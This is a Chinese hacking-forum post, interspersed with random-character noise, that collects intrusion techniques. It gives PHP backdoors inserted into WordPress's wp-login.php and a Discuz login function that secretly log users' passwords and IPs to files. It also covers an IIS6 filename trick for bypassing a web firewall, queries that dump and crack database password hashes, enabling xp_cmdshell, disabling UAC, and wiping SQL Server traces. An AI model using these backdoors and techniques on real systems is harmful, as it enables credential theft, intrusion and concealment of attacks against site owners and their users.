if($log_user&&$log_pwd&&$log_ip){* G7 u5 X+ S  C( g2 r; x" E! Y
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);5 W3 c6 ?4 n( p/ i9 E
}
$ t9 l3 g* N' X7 D- Z+ s, ]7 f$ R当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
7 x! A$ D6 y) B# R就是搜索case ‘login’
5 q, g9 p0 L% {3 }& I在它下面直接插入即可,记录的密码生成在pwd.txt中,1 a2 s) e) C, \9 M/ h0 w% G
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录0 J; R- a, w5 t# h' U* g
利用II6文件解析漏洞绕过安全狗代码:
6 `9 Z: ]1 Y/ f+ w) }  g) z;antian365.asp;antian365.jpg
% m: V8 b- F" z3 i0 c0 }( y3 Y
' i! _& t& q- f3 T各种类型数据库抓HASH破解最高权限密码!
& \% J9 V+ i2 e; `% \/ H$ i1.sql server2000! _, E1 f/ {8 I$ e) B3 S
SELECT password from master.dbo.sysxlogins where name='sa'
' i" _- t5 M; {* K0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503414 i  x: ]5 h2 I, `  q% P
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A* E" h* O6 V: C7 @- t
; _) x) c+ h& v: r$ T
0×0100- constant header
, Y0 ]) G; U# F  p/ r34767D5C- salt
& _( v2 V3 P1 o, p; H/ [9 P0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash* E) F! t) c) s2 Y$ ^: {3 R
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash1 a" n" w0 o% ?, O: j4 L
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash" v3 k+ u0 S4 K9 |1 D* ~
SQL server 2005:-0 Y+ V: R+ L( g9 @4 x7 l6 a0 m
SELECT password_hash FROM sys.sql_logins where name='sa'
  Y  X, s# t1 {( ?0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
" _+ c  {$ l+ P7 z2 f/ [1 J% W3 m0×0100- constant header! S" _9 I! d2 ?' a. _# U
993BF231-salt
( {1 u5 G. N$ P& f1 Q# j5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash2 ~2 n% J0 G, O$ S3 f+ T* G. |
crack case sensitive hash in cain, try brute force and dictionary based attacks.
& H. g$ D  G. e* i/ J8 Y
4 v3 N+ D$ C6 c7 ?1 B" zupdate:- following bernardo’s comments:-
% l6 n. `8 `7 f4 wuse function fn_varbintohexstr() to cast password in a hex string.
: N9 ]5 e8 }7 oe.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
/ {6 W7 w9 C4 w' d4 {2 Q1 C! D; [1 o4 W( l  J: k0 \# E
MYSQL:-4 _) W6 L" [0 B* }

3 _6 j1 Q2 O/ u7 ?; |In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.0 k/ V! v) ^& z8 c3 ^$ N- J

, A5 c. k( E4 q, T$ g# ?*mysql  < 4.1
& O, Q- z/ O4 {5 h& z
4 T0 \& P8 z; r5 V6 v4 G3 k' Amysql> SELECT PASSWORD(‘mypass’);1 ^* V. u' y3 I9 h5 P5 ~# j
+——————–+
6 W  z/ B4 c7 I9 C$ @| PASSWORD(‘mypass’) |0 V  Z9 Z2 j+ U8 m- B4 C9 o( M
+——————–+
; N& e  ]$ Q  ^& P) p# }6 \| 6f8c114b58f2ce9e   |
) u' {. |6 z  A1 ]) R. W7 ]/ u+——————–+
' x( I  S, f3 t' L! M3 \6 P; r3 p
*mysql >=4.12 V4 r  Y6 c/ G5 q# `

( y9 j9 \9 G9 G: r3 H3 y: a3 ymysql> SELECT PASSWORD(‘mypass’);! L: n" j5 t! |% X9 J" s4 R' \
+——————————————-+
. h1 ]8 ^% c4 ~- v| PASSWORD(‘mypass’)                        |% K+ a5 w$ _5 K/ O4 Q, c
+——————————————-+' d, K" ]$ R# d
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |3 M8 Q* g# z0 t
+——————————————-+
  O  [1 b8 {0 f" N* y6 V) D  A* D. Z+ B# p$ a% @8 T8 K5 Q
Select user, password from mysql.user
1 G* r, y* b8 {5 RThe hashes can be cracked in ‘cain and abel’
6 T7 ]  |! M7 \  _; S/ U& s$ Q( U# H  u/ ]6 C  A" U! o+ c
Postgres:-, ~7 N4 u. `! _/ d0 z7 B% |0 Q
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)4 P7 d% U7 C7 r/ Z0 `1 Y0 P2 `: T
select usename, passwd from pg_shadow;
$ x9 x4 w- y/ d# v* yusename      |  passwd' t- ?# E/ P& E6 _* m. h- k. F
——————+————————————-
1 I6 A+ w9 I3 u( etestuser            | md5fabb6d7172aadfda4753bf0507ed4396* z( b! N1 e4 T8 L' o
use mdcrack to crack these hashes:-" t6 |$ O: R: x( v6 @- N$ {9 c1 ?
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396( u9 v. J$ f5 }5 I7 s9 m3 Q; W& u# o
, D  v# A3 r8 W
Oracle:-
) j/ [3 l, d/ G& S# N( q1 Rselect name, password, spare4 from sys.user$5 o+ _3 o+ h3 f+ g* k
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
: R. `* f' l7 D, DMore on Oracle later, i am a bit bored….
# @$ E% q' U: L) s5 N0 A' M: f( R: E; J! P
4 P# X/ Z7 \/ ~; _/ Q
在sql server2005/2008中开启xp_cmdshell
3 w, _* x) W3 a( h-- To allow advanced options to be changed.$ L0 J" Y" C4 x' X( n" w8 @9 e
EXEC sp_configure 'show advanced options', 1% t, \, l( P9 D. [
GO
3 J' Q4 R) F; W5 Z: a-- To update the currently configured value for advanced options.
2 f4 x! R4 [" z  l( H, m+ u2 U4 @RECONFIGURE
- Z% _2 J( L6 d5 w. LGO5 R0 k  G% k, E1 ^, L: K3 b( T
-- To enable the feature.9 O7 }5 b$ r5 Y* J
EXEC sp_configure 'xp_cmdshell', 1
3 e% o5 ^0 x( {+ u9 \GO
8 j7 b" h1 I% M- p-- To update the currently configured value for this feature.
5 G  c9 ?% S, @5 n7 @5 d2 DRECONFIGURE+ b$ ~& `8 b- i; R" O
GO6 K: s1 O0 e1 w  G8 k  A
SQL 2008 server日志清除,在清楚前一定要备份。7 g& T+ u5 ~" W8 d8 C& o* W4 j
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
/ l1 u! k; {' }% I; n) rX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin0 J: g: x$ r# g7 Y) \1 U3 ^

, w3 ]+ ^6 n' z, g8 L) b对于SQL Server 2008以前的版本:1 n) ~- g6 e% u+ p0 I3 s
SQL Server 2005:5 X' H: K0 M) L; {
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
! F# Y; I& k& e9 w; Z1 {SQL Server 2000:9 x9 D3 k) u8 {7 O  f8 x
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
/ Z4 A! e3 v$ Y8 _* `; ^. b9 s) C5 W& _
本帖最后由 simeon 于 2013-1-3 09:51 编辑
3 N- z1 z1 N- u) U7 L
$ i8 I6 U1 J# b. ]
* U0 o$ Z; m, i* Rwindows 2008 文件权限修改  g! u& D( f! o9 W% K. f% d9 T6 [% m
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2 j) P9 `. U2 c6 @2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
: S% G5 d* `  [6 F: B一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,4 c+ e" m- {7 K% \8 e9 F
5 j7 i4 G# |8 v1 h, j! V6 Q
Windows Registry Editor Version 5.00; Q1 U( s9 G" c
[HKEY_CLASSES_ROOT\*\shell\runas]: f9 f; P1 u7 u( n- i
@="管理员取得所有权"
) u: F& e) Q3 ?' [0 z# J"NoWorkingDirectory"=""$ M0 }8 z8 t1 k. Y! P4 q
[HKEY_CLASSES_ROOT\*\shell\runas\command]0 u+ ^2 H* }1 ]2 `
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"/ a  S8 N. g6 m, x; \
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, b! N7 v" d, J3 U0 z7 E" J[HKEY_CLASSES_ROOT\exefile\shell\runas2]! P4 b8 C* _; z0 e4 a6 v; a
@="管理员取得所有权"
1 b  l; W. c' }  x8 @1 F' m"NoWorkingDirectory"=""
5 s+ n; S, o/ v# I[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]4 {1 {- ]% o. R- a* h, `9 Z% h; `
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
8 `+ v' U% @$ ]3 Z7 w3 B& A"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"2 L: p, J" y0 V! ^. a4 |

: ~* Z/ s% h( B; p4 r: O3 K1 Y[HKEY_CLASSES_ROOT\Directory\shell\runas]/ ^" ]1 p5 E$ z/ M6 _
@="管理员取得所有权"
% G7 E8 I& ~8 S"NoWorkingDirectory"=""7 c, D! R8 q0 M; ~+ B$ x. [; U
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
4 ]' n. Z8 H$ u- A/ g& L1 q@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"2 D+ b8 F! Y1 X% e  M
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"# T, N2 v3 g% ~" g- a/ O0 b- J, Z: W

4 s+ A& s) e: O2 c
; D% `, @2 q  G, l  z7 |+ n. {win7右键“管理员取得所有权”.reg导入5 J( ~( g7 _# q7 p: O# A% T* ]
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,- a5 T/ O' [; Z0 L7 D* \' l
1、C:\Windows这个路径的“notepad.exe”不需要替换% W* Q; P" v+ a- S. O: y
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
9 B* l4 q: e4 o8 [7 C  H3、四个“notepad.exe.mui”不要管
& ^7 C% G% f, ?0 K/ C4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
2 E- ?. `# |3 Z$ f6 G1 oC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
. J2 ~( F3 d9 S# l替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,! M& W2 }' V; d
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
# x' g  u' d4 |/ t4 t* @windows 2008中关闭安全策略: 5 k1 S4 _' Z1 y# [: G
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
! Q# ]# c  W- |* ^' J* |$ c修改uc_client目录下的client.php 在
% U$ @* s8 |2 j+ ~7 j  Y; Zfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {4 [$ s/ a( c/ H$ \, a
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php& W' b" `3 i6 `! U, f
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw& `* `- d* n) x; m2 u8 S% o
if(getenv('HTTP_CLIENT_IP')) {$ T0 e( `" H+ {: r! P0 s7 k4 C
$onlineip = getenv('HTTP_CLIENT_IP');
; L3 U, A; i( O  I" c) w1 S. w1 o2 O} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
) B' U+ n/ U! b* q: C0 P7 F& W$onlineip = getenv('HTTP_X_FORWARDED_FOR');0 ~- [+ W& a+ W( g+ c
} elseif(getenv('REMOTE_ADDR')) {$ D1 z+ \& n) d( ^2 C. M. m
$onlineip = getenv('REMOTE_ADDR');7 S/ q# M! i% t6 z- X: a
} else {: k8 K! L) H- j& v7 w  j  B
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];' A, }' m2 l# y
}2 A; F9 u' \9 f" g$ ?
     $showtime=date("Y-m-d H:i:s");7 D+ m: a2 o  f9 c
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
( s1 U6 l; z3 H5 h: V8 G    $handle=fopen('./data/cache/csslog.php','a+');
' H9 c  x% ?& C3 r1 j    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表